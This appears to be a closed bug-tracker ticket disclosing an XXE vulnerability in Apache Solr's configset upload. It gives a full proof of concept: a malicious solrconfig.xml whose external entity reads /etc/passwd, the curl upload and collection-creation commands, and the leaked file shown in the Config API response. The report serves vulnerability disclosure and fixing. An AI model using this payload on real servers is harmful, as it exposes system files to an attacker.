Details
-
Bug
-
Status: Closed
-
Blocker
-
Resolution: Fixed
-
5.5.5, 6.6.3, 7.3
Description
While trying to work around the issue of being unable to upload large files to ZK (without jute.maxbuffer setting), antz brought to my notice that he was able to successfully achieve that using XXE. That alarmed me! Our managed-schema and solrconfig.xml parse XXEs!
Here's a very nasty attack I could execute using this and configset upload functionality:
Step 1: Create a configset with just two files in a directory called "minimal":
schema.xml:
<schema name="minimal" version="1.1"> <fieldType name="string" class="solr.StrField"/> <dynamicField name="*" type="string" indexed="true" stored="true"/> </schema>
solrconfig.xml
<?xml version="1.0" ?> <!DOCTYPE doc [ <!ENTITY passwdFile SYSTEM "file:///etc/passwd"> ]> <config> <dataDir>${solr.data.dir:}</dataDir> <directoryFactory name="DirectoryFactory" class="${solr.directoryFactory:solr.NRTCachingDirectoryFactory}"/> <schemaFactory class="ClassicIndexSchemaFactory"/> <luceneMatchVersion>7.3.0</luceneMatchVersion> <updateHandler class="solr.DirectUpdateHandler2"> <commitWithin> <softCommit>${solr.commitwithin.softcommit:true}</softCommit> </commitWithin> </updateHandler> <requestHandler name="/select" class="solr.SearchHandler"> <lst name="defaults"> <str name="echoParams">explicit</str> <str name="indent">true</str> <str name="df">text</str> <str name="password">&passwdFile;</str> </lst> </requestHandler> </config>
Step 2: Upload the minimal directory to Solr using configset upload API:
[ishan@x260 solr] $ (cd minimal && zip -r - *) | curl -X POST --header "Content-Type:application/octet-stream" --data-binary @- "http://localhost:8983/solr/admin/configs?action=UPLOAD&name=mybadconfigset" adding: schema.xml (deflated 42%) adding: solrconfig.xml (deflated 50%) { "responseHeader":{ "status":0, "QTime":23}}
Step 3: Create a collection using this configset
[ishan@x260 solr] $ curl "http://localhost:8983/solr/admin/collections?action=CREATE&name=mybadcoll&numShards=1&collection.configName=mybadconfigset" { "responseHeader":{ "status":0, "QTime":3431}, "success":{ "192.168.1.6:8983_solr":{ "responseHeader":{ "status":0, "QTime":2062}, "core":"mybadcoll_shard1_replica_n1"}}}
Step 4: Use Config API to check the select handler's config. The file is revealed!
[ishan@x260 solr] $ curl "http://localhost:8983/solr/mybadcoll/config/requestHandler"|jq % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 7939 100 7939 0 0 7939 0 0:00:01 --:--:-- 0:00:01 323k { "responseHeader": { "status": 0, "QTime": 16 }, "config": { "requestHandler": { "/select": { "name": "/select", "class": "solr.SearchHandler", "defaults": { "echoParams": "explicit", "indent": "true", "df": "text", "password": "root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\ngames:x:12:100:games:/usr/games:/sbin/nologin\nftp:x:14:50:FTP User:/var/ftp:/sbin/nologin\nnobody:x:99:99:Nobody:/:/sbin/nologin\nsystemd-timesync:x:999:998:systemd Time Synchronization:/:/sbin/nologin\nsystemd-network:x:192:192:systemd Network Management:/:/sbin/nologin\nsystemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin\ndbus:x:81:81:System message bus:/:/sbin/nologin\npolkitd:x:998:997:User for polkitd:/:/sbin/nologin\ngeoclue:x:997:996:User for geoclue:/var/lib/geoclue:/sbin/nologin\nrtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin\npulse:x:171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin\navahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin\nchrony:x:996:992::/var/lib/chrony:/sbin/nologin\nrpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin\nusbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin\nradvd:x:75:75:radvd user:/:/sbin/nologin\nqemu:x:107:107:qemu user:/:/sbin/nologin\napache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin\ncolord:x:995:990:User for colord:/var/lib/colord:/sbin/nologin\nabrt:x:173:173::/etc/abrt:/sbin/nologin\nsaslauth:x:994:76:Saslauthd user:/run/saslauthd:/sbin/nologin\nopenvpn:x:993:988:OpenVPN:/etc/openvpn:/sbin/nologin\nnm-openvpn:x:992:987:Default user for running openvpn spawned by NetworkManager:/:/sbin/nologin\ngdm:x:42:42::/var/lib/gdm:/sbin/nologin\nsetroubleshoot:x:991:985::/var/lib/setroubleshoot:/sbin/nologin\nrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin\nnfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin\nnm-openconnect:x:990:984:NetworkManager user for OpenConnect:/:/sbin/nologin\ngnome-initial-setup:x:989:983::/run/gnome-initial-setup/:/sbin/nologin\nsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin\ntss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin\ntcpdump:x:72:72::/:/sbin/nologin\nishan:x:1000:1000:Ishan Chattopadhyaya:/home/ishan:/bin/bash\nsystemd-coredump:x:982:982:systemd Core Dumper:/:/sbin/nologin\nakmods:x:981:981:User is used by akmods to build akmod packages:/var/cache/akmods/:/sbin/nologin\nkube:x:980:978:Kubernetes user:/:/sbin/nologin\nzookeeper:x:979:977:ZooKeeper service account:/var/lib/zookeeper:/sbin/nologin\nntp:x:38:38::/etc/ntp:/sbin/nologin\nautossh:x:977:975:autossh service account:/etc/autossh:/usr/sbin/nologin\nnginx:x:976:974:Nginx web server:/var/lib/nginx:/sbin/nologin\ngluster:x:975:972:GlusterFS daemons:/run/gluster:/sbin/nologin\npipewire:x:974:971:PipeWire System Daemon:/var/run/pipewire:/sbin/nologin\nunbound:x:973:970:Unbound DNS resolver:/etc/unbound:/sbin/nologin\nnetdata:x:972:969:NetData User:/var/lib/netdata:/sbin/nologin\ndnsmasq:x:967:967:Dnsmasq DHCP and DNS server:/var/lib/dnsmasq:/sbin/nologin\n" }